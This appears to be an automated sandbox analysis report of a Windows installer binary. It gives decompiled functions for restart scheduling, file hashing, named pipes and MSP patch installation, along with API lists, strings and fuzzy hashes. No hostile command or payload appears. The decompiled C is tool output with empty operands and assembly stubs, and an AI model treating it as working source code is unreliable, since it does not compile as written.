                                                                                                                                                                  APIs
                                                                                                                                                                  • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD),00000001,00000000,00000000), ref: 0040F348
                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,0000046C,00000000,8BE275C0), ref: 0040F351
                                                                                                                                                                  • CreateNamedPipeW.KERNEL32(000000FF,00080003,00000000,00000001,00010000,00010000,00000001,00000000,00000000,00000000,0000046C,00000000,8BE275C0), ref: 0040F3F2
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040F3FF
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,pipe.cpp,0000013D,00000000), ref: 0040F4C5
                                                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 0040F4F3
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to allocate full name of pipe: %ls, xrefs: 0040F3BF
                                                                                                                                                                  • \\.\pipe\%ls, xrefs: 0040F3A9
                                                                                                                                                                  • Failed to create the security descriptor for the connection event and pipe., xrefs: 0040F37F
                                                                                                                                                                  • Failed to allocate full name of cache pipe: %ls, xrefs: 0040F45C
                                                                                                                                                                  • D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD), xrefs: 0040F343
                                                                                                                                                                  • \\.\pipe\%ls.Cache, xrefs: 0040F446
                                                                                                                                                                  • Failed to create pipe: %ls, xrefs: 0040F430, 0040F4B6
                                                                                                                                                                  • pipe.cpp, xrefs: 0040F375, 0040F423, 0040F4A9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DescriptorErrorLastSecurity$CloseConvertCreateFreeHandleLocalNamedPipeString
                                                                                                                                                                  • String ID: D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD)$Failed to allocate full name of cache pipe: %ls$Failed to allocate full name of pipe: %ls$Failed to create pipe: %ls$Failed to create the security descriptor for the connection event and pipe.$\\.\pipe\%ls$\\.\pipe\%ls.Cache$pipe.cpp
                                                                                                                                                                  • API String ID: 3065245045-3253666091
                                                                                                                                                                  • Opcode ID: ee05c8cebe0db99337df20d0425fab9e359106f373ba488633c3cb07a3529b7d
                                                                                                                                                                  • Instruction ID: dc95f27b805f7c3a9a776c920ead732d8815f9aa21f80d8eb90c058fd0cb55ad
                                                                                                                                                                  • Opcode Fuzzy Hash: ee05c8cebe0db99337df20d0425fab9e359106f373ba488633c3cb07a3529b7d
                                                                                                                                                                  • Instruction Fuzzy Hash: C951A271E40214BBEB219AA59D46BAFB6A4EF04715F20023BFE00F61D0D3B94A449A98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004011BF, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 136COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 42%
                                                                                                                                                                  			E004011BF(void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;
				void* __edi;
				void* __esi;
				signed int _t13;
				int _t24;
				signed short _t31;
				signed short _t34;
				signed short _t37;
				int _t47;
				int _t48;
				signed int _t60;

				_t13 =  *0x4560d0; // 0xae480e18
				_v8 = _t13 ^ _t60;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v28 = 0;
				_t47 = 0;
				if(OpenProcessToken(GetCurrentProcess(), 0x20,  &_v28) != 0) {
					_v24.PrivilegeCount = 1;
					_v12 = 2;
					if(LookupPrivilegeValueW(0, L"SeShutdownPrivilege",  &(_v24.Privileges)) != 0) {
						if(AdjustTokenPrivileges(_v28, 0,  &_v24, 0x10, 0, 0) != 0) {
							do {
								_t48 = 0;
								Sleep(0x3e8);
								_push(0x80040002);
								_push(1);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								if( *0x456f4c() == 0) {
									_t48 =  <=  ? GetLastError() : _t30 & 0x0000ffff | 0x80070000;
								}
								_t24 = _t47;
								_t47 = _t47 + 1;
							} while (_t24 < 0xa && (_t48 == 0x800704f7 || _t48 == 0x80070015));
							if(_t48 < 0) {
								E004300D9(_t24, "engine.cpp", 0x2f3, _t48);
								_push("Failed to schedule restart.");
								goto L13;
							}
						} else {
							_t31 = GetLastError();
							_t53 =  <=  ? _t31 : _t31 & 0x0000ffff | 0x80070000;
							_t48 =  >=  ? 0x80004005 :  <=  ? _t31 : _t31 & 0x0000ffff | 0x80070000;
							E004300D9(0x80004005, "engine.cpp", 0x2df, _t48);
							_push("Failed to adjust token to add shutdown privileges.");
							goto L13;
						}
					} else {
						_t34 = GetLastError();
						_t56 =  <=  ? _t34 : _t34 & 0x0000ffff | 0x80070000;
						_t48 =  >=  ? 0x80004005 :  <=  ? _t34 : _t34 & 0x0000ffff | 0x80070000;
						E004300D9(0x80004005, "engine.cpp", 0x2da, _t48);
						_push("Failed to get shutdown privilege LUID.");
						goto L13;
					}
				} else {
					_t37 = GetLastError();
					_t59 =  <=  ? _t37 : _t37 & 0x0000ffff | 0x80070000;
					_t48 =  >=  ? 0x80004005 :  <=  ? _t37 : _t37 & 0x0000ffff | 0x80070000;
					E004300D9(0x80004005, "engine.cpp", 0x2d3, _t48);
					_push("Failed to get process token.");
					L13:
					_push(_t48);
					E00430A57();
				}
				if(_v28 != 0) {
					CloseHandle(_v28);
				}
				return L004267AF(_t48, _v8 ^ _t60, _t47, _t48);
			}

















                                                                                                                                                                  0x004011c5
                                                                                                                                                                  0x004011cc
                                                                                                                                                                  0x004011d7
                                                                                                                                                                  0x004011d8
                                                                                                                                                                  0x004011d9
                                                                                                                                                                  0x004011da
                                                                                                                                                                  0x004011e3
                                                                                                                                                                  0x004011e6
                                                                                                                                                                  0x004011f7
                                                                                                                                                                  0x0040123b
                                                                                                                                                                  0x00401242
                                                                                                                                                                  0x00401251
                                                                                                                                                                  0x0040129f
                                                                                                                                                                  0x004012d6
                                                                                                                                                                  0x004012db
                                                                                                                                                                  0x004012dd
                                                                                                                                                                  0x004012e3
                                                                                                                                                                  0x004012e8
                                                                                                                                                                  0x004012ea
                                                                                                                                                                  0x004012eb
                                                                                                                                                                  0x004012ec
                                                                                                                                                                  0x004012ed
                                                                                                                                                                  0x004012f6
                                                                                                                                                                  0x00401309
                                                                                                                                                                  0x00401309
                                                                                                                                                                  0x0040130c
                                                                                                                                                                  0x0040130e
                                                                                                                                                                  0x0040130f
                                                                                                                                                                  0x00401326
                                                                                                                                                                  0x00401333
                                                                                                                                                                  0x00401338
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401338
                                                                                                                                                                  0x004012a1
                                                                                                                                                                  0x004012a1
                                                                                                                                                                  0x004012b2
                                                                                                                                                                  0x004012bc
                                                                                                                                                                  0x004012ca
                                                                                                                                                                  0x004012cf
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004012cf
                                                                                                                                                                  0x00401253
                                                                                                                                                                  0x00401253
                                                                                                                                                                  0x00401264
                                                                                                                                                                  0x0040126e
                                                                                                                                                                  0x0040127c
                                                                                                                                                                  0x00401281
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401281
                                                                                                                                                                  0x004011f9
                                                                                                                                                                  0x004011f9
                                                                                                                                                                  0x0040120a
                                                                                                                                                                  0x00401214
                                                                                                                                                                  0x00401222
                                                                                                                                                                  0x00401227
                                                                                                                                                                  0x0040133d
                                                                                                                                                                  0x0040133d
                                                                                                                                                                  0x0040133e
                                                                                                                                                                  0x00401344
                                                                                                                                                                  0x00401348
                                                                                                                                                                  0x0040134d
                                                                                                                                                                  0x0040134d
                                                                                                                                                                  0x00401363

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000020,?,?,00000000,?,?,?,?,?,?,?), ref: 004011E8
                                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 004011EF
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 004011F9
                                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32 ref: 00401249
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00401253
                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040134D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastProcess$CloseCurrentHandleLookupOpenPrivilegeTokenValue
                                                                                                                                                                  • String ID: Failed to adjust token to add shutdown privileges.$Failed to get process token.$Failed to get shutdown privilege LUID.$Failed to schedule restart.$SeShutdownPrivilege$engine.cpp
                                                                                                                                                                  • API String ID: 4232854991-1583736410
                                                                                                                                                                  • Opcode ID: 43074383a428bbc5c8e60fa1ee0ceaf5a9b694cd136d8fb73782ec4095ae8277
                                                                                                                                                                  • Instruction ID: 136e48f9ad1cdbcf1ab916fb6b19b59be18224ef9a29a49cf331480ed5284ed9
                                                                                                                                                                  • Opcode Fuzzy Hash: 43074383a428bbc5c8e60fa1ee0ceaf5a9b694cd136d8fb73782ec4095ae8277
                                                                                                                                                                  • Instruction Fuzzy Hash: D8415332A40625AAE7109BA59C49BAB75E8EB08755F11113AFE01FA1A0D7798C0046ED
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0043821C, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 166encryptionCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 46%
                                                                                                                                                                  			E0043821C(void* __ecx, void* __edx, void* __eflags, void* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char _a20, long _a24) {
				signed int _v8;
				void _v4104;
				char _v4108;
				long _v4112;
				long _v4116;
				intOrPtr _v4120;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t31;
				long** _t37;
				signed short _t38;
				signed short _t41;
				signed short _t42;
				signed short _t46;
				signed short _t47;
				void* _t48;
				signed short _t50;
				signed short _t51;
				signed short _t52;
				signed short _t53;
				signed short _t54;
				signed short _t55;
				long _t56;
				void* _t61;
				signed short _t65;
				signed short _t68;
				signed short _t71;
				signed short _t74;
				signed short _t77;
				signed int _t81;
				void* _t84;

				_t84 = __eflags;
				E0042F730(0x1014);
				_t31 =  *0x4560d0; // 0xae480e18
				_v8 = _t31 ^ _t81;
				_t56 = _a24;
				_t61 = _a4;
				_v4120 = _a16;
				_t62 = 0;
				_v4112 = 0;
				_v4108 = 0;
				_v4116 = 0;
				E004267C0(_t56, __ecx, _t61, 0, _t84);
				_t37 =  &_v4112;
				__imp__CryptAcquireContextW(_t37, 0, 0, _a8, 0xf0000040,  &_v4104, 0, 0x1000);
				if(_t37 != 0) {
					_t38 =  &_v4108;
					__imp__CryptCreateHash(_v4112, _a12, 0, 0, _t38);
					__eflags = _t38;
					if(_t38 != 0) {
						while(1) {
							_t41 = ReadFile(_t61,  &_v4104, 0x1000,  &_v4116, 0);
							__eflags = _t41;
							if(_t41 == 0) {
								break;
							}
							_push(0);
							__eflags = _v4116 - _t62;
							if(_v4116 == _t62) {
								_t42 =  &_a20;
								__imp__CryptGetHashParam(_v4108, 2, _v4120, _t42);
								__eflags = _t42;
								if(_t42 != 0) {
									__eflags = _t56;
									if(_t56 != 0) {
										_push(1);
										_t46 = SetFilePointerEx(_t61, 0, 0, _t56);
										__eflags = _t46;
										if(_t46 == 0) {
											_t47 = GetLastError();
											__eflags = _t47;
											_t65 =  <=  ? _t47 : _t47 & 0x0000ffff | 0x80070000;
											_t48 = 0x80004005;
											__eflags = _t65;
											_t62 =  >=  ? 0x80004005 : _t65;
											_push( >=  ? 0x80004005 : _t65);
											_push(0xbb);
											goto L8;
										}
									}
								} else {
									_t50 = GetLastError();
									__eflags = _t50;
									_t68 =  <=  ? _t50 : _t50 & 0x0000ffff | 0x80070000;
									_t48 = 0x80004005;
									__eflags = _t68;
									_t62 =  >=  ? 0x80004005 : _t68;
									_push( >=  ? 0x80004005 : _t68);
									_push(0xb4);
									goto L8;
								}
							} else {
								_t51 =  &_v4104;
								__imp__CryptHashData(_v4108, _t51, _v4116);
								__eflags = _t51;
								if(_t51 == 0) {
									_t52 = GetLastError();
									__eflags = _t52;
									_t71 =  <=  ? _t52 : _t52 & 0x0000ffff | 0x80070000;
									_t48 = 0x80004005;
									__eflags = _t71;
									_t62 =  >=  ? 0x80004005 : _t71;
									_push( >=  ? 0x80004005 : _t71);
									_push(0xad);
									goto L8;
								} else {
									continue;
								}
							}
							goto L9;
						}
						_t53 = GetLastError();
						__eflags = _t53;
						_t74 =  <=  ? _t53 : _t53 & 0x0000ffff | 0x80070000;
						_t48 = 0x80004005;
						__eflags = _t74;
						_t62 =  >=  ? 0x80004005 : _t74;
						_push( >=  ? 0x80004005 : _t74);
						_push(0xa2);
					} else {
						_t54 = GetLastError();
						__eflags = _t54;
						_t77 =  <=  ? _t54 : _t54 & 0x0000ffff | 0x80070000;
						_t48 = 0x80004005;
						__eflags = _t77;
						_t62 =  >=  ? 0x80004005 : _t77;
						_push( >=  ? 0x80004005 : _t77);
						_push(0x9a);
					}
					goto L8;
				} else {
					_t55 = GetLastError();
					_t80 =  <=  ? _t55 : _t55 & 0x0000ffff | 0x80070000;
					_t48 = 0x80004005;
					_t62 =  >=  ? 0x80004005 :  <=  ? _t55 : _t55 & 0x0000ffff | 0x80070000;
					_push( >=  ? 0x80004005 :  <=  ? _t55 : _t55 & 0x0000ffff | 0x80070000);
					_push(0x94);
					L8:
					_push("cryputil.cpp");
					E004300D9(_t48);
				}
				L9:
				if(_v4108 != 0) {
					__imp__CryptDestroyHash(_v4108);
				}
				if(_v4112 != 0) {
					CryptReleaseContext(_v4112, 0);
				}
				return L004267AF(_t62, _v8 ^ _t81, _t61, _t62);
			}



































                                                                                                                                                                  0x0043821c
                                                                                                                                                                  0x00438224
                                                                                                                                                                  0x00438229
                                                                                                                                                                  0x00438230
                                                                                                                                                                  0x00438237
                                                                                                                                                                  0x0043823c
                                                                                                                                                                  0x0043823f
                                                                                                                                                                  0x0043824d
                                                                                                                                                                  0x0043824f
                                                                                                                                                                  0x00438255
                                                                                                                                                                  0x0043825b
                                                                                                                                                                  0x00438268
                                                                                                                                                                  0x00438270
                                                                                                                                                                  0x00438281
                                                                                                                                                                  0x00438289
                                                                                                                                                                  0x004382b4
                                                                                                                                                                  0x004382c8
                                                                                                                                                                  0x004382ce
                                                                                                                                                                  0x004382d0
                                                                                                                                                                  0x00438327
                                                                                                                                                                  0x0043833d
                                                                                                                                                                  0x00438343
                                                                                                                                                                  0x00438345
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004382f8
                                                                                                                                                                  0x004382fa
                                                                                                                                                                  0x00438300
                                                                                                                                                                  0x004383da
                                                                                                                                                                  0x004383ec
                                                                                                                                                                  0x004383f2
                                                                                                                                                                  0x004383f4
                                                                                                                                                                  0x0043841f
                                                                                                                                                                  0x00438421
                                                                                                                                                                  0x00438427
                                                                                                                                                                  0x0043842f
                                                                                                                                                                  0x00438435
                                                                                                                                                                  0x00438437
                                                                                                                                                                  0x0043843d
                                                                                                                                                                  0x0043844c
                                                                                                                                                                  0x0043844e
                                                                                                                                                                  0x00438451
                                                                                                                                                                  0x00438456
                                                                                                                                                                  0x00438458
                                                                                                                                                                  0x0043845b
                                                                                                                                                                  0x0043845c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0043845c
                                                                                                                                                                  0x00438437
                                                                                                                                                                  0x004383f6
                                                                                                                                                                  0x004383f6
                                                                                                                                                                  0x00438405
                                                                                                                                                                  0x00438407
                                                                                                                                                                  0x0043840a
                                                                                                                                                                  0x0043840f
                                                                                                                                                                  0x00438411
                                                                                                                                                                  0x00438414
                                                                                                                                                                  0x00438415
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00438415
                                                                                                                                                                  0x00438306
                                                                                                                                                                  0x0043830c
                                                                                                                                                                  0x00438319
                                                                                                                                                                  0x0043831f
                                                                                                                                                                  0x00438321
                                                                                                                                                                  0x004383b4
                                                                                                                                                                  0x004383c3
                                                                                                                                                                  0x004383c5
                                                                                                                                                                  0x004383c8
                                                                                                                                                                  0x004383cd
                                                                                                                                                                  0x004383cf
                                                                                                                                                                  0x004383d2
                                                                                                                                                                  0x004383d3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00438321
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00438300
                                                                                                                                                                  0x00438347
                                                                                                                                                                  0x00438356
                                                                                                                                                                  0x00438358
                                                                                                                                                                  0x0043835b
                                                                                                                                                                  0x00438360
                                                                                                                                                                  0x00438362
                                                                                                                                                                  0x00438365
                                                                                                                                                                  0x00438366
                                                                                                                                                                  0x004382d2
                                                                                                                                                                  0x004382d2
                                                                                                                                                                  0x004382e1
                                                                                                                                                                  0x004382e3
                                                                                                                                                                  0x004382e6
                                                                                                                                                                  0x004382eb
                                                                                                                                                                  0x004382ed
                                                                                                                                                                  0x004382f0
                                                                                                                                                                  0x004382f1
                                                                                                                                                                  0x004382f1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0043828b
                                                                                                                                                                  0x0043828b
                                                                                                                                                                  0x0043829c
                                                                                                                                                                  0x0043829f
                                                                                                                                                                  0x004382a6
                                                                                                                                                                  0x004382a9
                                                                                                                                                                  0x004382aa
                                                                                                                                                                  0x0043836b
                                                                                                                                                                  0x0043836b
                                                                                                                                                                  0x00438370
                                                                                                                                                                  0x00438370
                                                                                                                                                                  0x00438375
                                                                                                                                                                  0x0043837c
                                                                                                                                                                  0x00438384
                                                                                                                                                                  0x00438384
                                                                                                                                                                  0x00438391
                                                                                                                                                                  0x0043839b
                                                                                                                                                                  0x0043839b
                                                                                                                                                                  0x004383b1

                                                                                                                                                                  APIs
                                                                                                                                                                  • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000003,F0000040,00000003,00000000,00000000,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000), ref: 00438281
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0043828B
                                                                                                                                                                  • CryptCreateHash.ADVAPI32(?,?,00000000,00000000,?), ref: 004382C8
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004382D2
                                                                                                                                                                  • CryptDestroyHash.ADVAPI32(00000000), ref: 00438384
                                                                                                                                                                  • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0043839B
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004383B4
                                                                                                                                                                  • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 004383EC
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004383F6
                                                                                                                                                                  • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00008004,00000001), ref: 0043842F
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0043843D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CryptErrorLast$Hash$Context$AcquireCreateDestroyFileParamPointerRelease
                                                                                                                                                                  • String ID: cryputil.cpp
                                                                                                                                                                  • API String ID: 1716956426-2185294990
                                                                                                                                                                  • Opcode ID: a663ab9fd9d6b17b0fffe7031fa32abdb2290cbdf5a8d94913381da743af50b5
                                                                                                                                                                  • Instruction ID: 6800663b84aa99896491c85a727cbb850c1869e8d4ec4c318f534a8867d48127
                                                                                                                                                                  • Opcode Fuzzy Hash: a663ab9fd9d6b17b0fffe7031fa32abdb2290cbdf5a8d94913381da743af50b5
                                                                                                                                                                  • Instruction Fuzzy Hash: F651A931A00364ABEB319B659D44BDBB6E4FF0C741F014176BE49E6190D7798D808EE9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0041D0BC, Relevance: 25.3, Strings: 20, Instructions: 322COMMONCrypto
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 77%
                                                                                                                                                                  			E0041D0BC(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr* _a28) {
				signed int _v8;
				char _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				intOrPtr* _v1608;
				char _v1612;
				signed int _v1616;
				intOrPtr _v1620;
				intOrPtr _v1624;
				intOrPtr _v1628;
				intOrPtr _v1632;
				intOrPtr _v1636;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t101;
				signed int _t111;
				signed int _t112;
				signed int _t121;
				signed int _t123;
				signed int _t131;
				signed int _t135;
				signed int _t145;
				intOrPtr _t173;
				intOrPtr* _t174;
				signed int _t175;
				signed int _t178;
				void* _t179;
				intOrPtr _t189;
				signed int _t190;
				signed int _t192;
				signed int _t194;
				signed int _t195;

				_t101 =  *0x4560d0; // 0xae480e18
				_v8 = _t101 ^ _t195;
				_v1620 = _a4;
				_t172 = _a12;
				_v1628 = _a20;
				_t189 = _a8;
				_v1636 = _a24;
				_v1608 = _a28;
				_t190 = 0;
				_push(0x628);
				_t177 =  !=  ? 1 : 0x102;
				_push(0);
				_push( &_v1584);
				_v1632 = _a12;
				_v1624 = 0x102;
				E004267C0(_a12,  !=  ? 1 : 0x102, _t189, 0,  *((intOrPtr*)( *((intOrPtr*)(_t189 + 8)) + 0x98)));
				_v1612 = 0;
				_v1604 = 0;
				_v1596 = 0;
				_v1592 = 0;
				_v1588 = 0;
				_v1600 = 0;
				_t178 = 0;
				_v1616 = 0;
				if( *((intOrPtr*)(_t189 + 0x2c)) <= 0) {
					L16:
					_t111 = E00435549(_t178, 1, _v1628, _v1624, _v1620, _v1636, _a16,  &_v1584);
					__eflags = _t111;
					if(_t111 >= 0) {
						_t112 =  *(_t189 + 0x1c);
						_t179 = 0;
						__eflags = _t112;
						if(_t112 == 0) {
							L25:
							_t192 = E0041AC12(_t189,  *((intOrPtr*)( *((intOrPtr*)(_t189 + 8)) + 0x9c)),  *((intOrPtr*)( *((intOrPtr*)(_t189 + 8)) + 0xa0)), _t172, _a16,  &_v1588, _t179);
							__eflags = _t192;
							if(_t192 >= 0) {
								_t181 =  &_v1600;
								_t192 = E0041AC12(_t189,  *((intOrPtr*)( *((intOrPtr*)(_t189 + 8)) + 0x9c)),  *((intOrPtr*)( *((intOrPtr*)(_t189 + 8)) + 0xa0)), _t172, _a16,  &_v1600, 1);
								__eflags = _t192;
								if(_t192 >= 0) {
									_push( *((intOrPtr*)(_t189 + 0xc)));
									_push(_v1600);
									_push(_v1596);
									_push(E0040E2BB( *((intOrPtr*)(_t189 + 0x24))));
									E00402003(2, 0x20000132,  *((intOrPtr*)( *((intOrPtr*)(_t189 + 8)))));
									_t121 =  *((intOrPtr*)(_t189 + 0x24)) - 1;
									__eflags = _t121;
									if(_t121 == 0) {
										_t173 = 0;
										_t123 = E00433C35( &_v1600,  &_v1588, L" REBOOT=ReallySuppress", 0);
										__eflags = _t123;
										if(_t123 >= 0) {
											_push(L"IGNOREDEPENDENCIES");
											_t194 = E00433CEA( &_v1588, L"%ls %ls=ALL", _v1588);
											__eflags = _t194;
											if(__eflags >= 0) {
												_t194 = E00435768(__eflags, _v1592,  *((intOrPtr*)(_t189 + 0xc)), _v1588,  &_v1612);
												__eflags = _t194;
												if(_t194 >= 0) {
													L48:
													E00435855( &_v1584);
													__eflags = _v1604;
													if(_v1604 != 0) {
														E004380AB(_v1604);
													}
													__eflags = _v1596;
													if(_v1596 != 0) {
														E004380AB(_v1596);
													}
													__eflags = _v1588;
													if(_v1588 != 0) {
														E004380AB(_v1588);
													}
													__eflags = _v1600;
													if(_v1600 != 0) {
														E004380AB(_v1600);
													}
													__eflags = _v1592;
													if(_v1592 != 0) {
														E004380AB(_v1592);
													}
													_t131 = _v1612 - _t173;
													__eflags = _t131;
													if(_t131 == 0) {
														 *_v1608 = _t173;
													} else {
														_t135 = _t131 - 1;
														__eflags = _t135;
														if(_t135 == 0) {
															 *_v1608 = 1;
														} else {
															__eflags = _t135 == 1;
															if(_t135 == 1) {
																 *_v1608 = 2;
															}
														}
													}
													__eflags = _v8 ^ _t195;
													return L004267AF(_t194, _v8 ^ _t195, _t189, _t194);
												}
												_push("Failed to uninstall MSP package.");
												L46:
												_push(_t194);
												E00430A57();
												L47:
												goto L48;
											}
											_push("Failed to add the list of dependencies to ignore to the properties.");
											goto L46;
										}
										_push("Failed to add reboot suppression property on uninstall.");
										goto L46;
									}
									_t145 = _t121 - 1;
									__eflags = _t145;
									if(_t145 == 0) {
										L32:
										_t173 = 0;
										_t194 = E00433C35(_t181,  &_v1588, L" PATCH=\"", 0);
										__eflags = _t194;
										if(_t194 >= 0) {
											_t194 = E00433C35(_t181,  &_v1588, _v1592, 0);
											__eflags = _t194;
											if(_t194 >= 0) {
												_t194 = E00433C35(_t181,  &_v1588, L"\" REBOOT=ReallySuppress", 0);
												__eflags = _t194;
												if(__eflags >= 0) {
													_t194 = E00434F98(__eflags,  *((intOrPtr*)(_t189 + 0xc)), 0, 5, _v1588,  &_v1612);
													__eflags = _t194;
													if(_t194 >= 0) {
														goto L48;
													}
													_push("Failed to install MSP package.");
													goto L46;
												}
												_push("Failed to add reboot suppression property on install.");
												goto L46;
											}
											_push("Failed to add patches to PATCH property on install.");
											goto L46;
										}
										_push("Failed to add PATCH property on install.");
										goto L46;
									}
									__eflags = _t145 != 3;
									if(_t145 != 3) {
										L23:
										_t173 = 0;
										goto L48;
									}
									goto L32;
								}
								_push("Failed to add properties to obfuscated argument string.");
								L12:
								_push(_t192);
								E00430A57();
								_t173 = 0;
								goto L47;
							}
							_push("Failed to add properties to argument string.");
							goto L12;
						}
						__eflags =  *_t112;
						if( *_t112 == 0) {
							goto L25;
						}
						_t194 = E00435046(0x1fdf, _t112, 0);
						__eflags = _t194;
						if(_t194 >= 0) {
							_t179 = 0;
							__eflags = 0;
							goto L25;
						}
						_push( *(_t189 + 0x1c));
						E00430A57(_t194, "Failed to enable logging for package: %ls to: %ls",  *((intOrPtr*)( *((intOrPtr*)(_t189 + 8)))));
						goto L23;
					}
					_push("Failed to initialize external UI handler.");
					goto L12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t174 =  *((intOrPtr*)( *((intOrPtr*)(_t189 + 0x28)) + 4 + _t178 * 8));
					if( *((intOrPtr*)(_t189 + 0x24)) != 2) {
						goto L5;
					}
					_t194 = E00413BE9(_t178, _t189,  *((intOrPtr*)(_t174 + 0x14)),  *((intOrPtr*)(_t174 + 0x24)),  &_v1604);
					if(_t194 < 0) {
						E00430A57(_t194, "Failed to get cached path for MSP package: %ls",  *_t174);
						goto L23;
					}
					_t192 = E004314A9(_v1604,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t174 + 0x7c)))) + 0x18)),  &_v1596);
					if(_t192 < 0) {
						_push("Failed to build MSP path.");
						goto L12;
					} else {
						_t175 = _v1596;
						_t190 = 0;
						L6:
						if(_v1592 == 0) {
							L8:
							_t192 = E00433C35(_t178,  &_v1592, _t175, 0);
							if(_t192 < 0) {
								_push("Failed to append patch.");
								goto L12;
							}
							_t178 = _v1616 + 1;
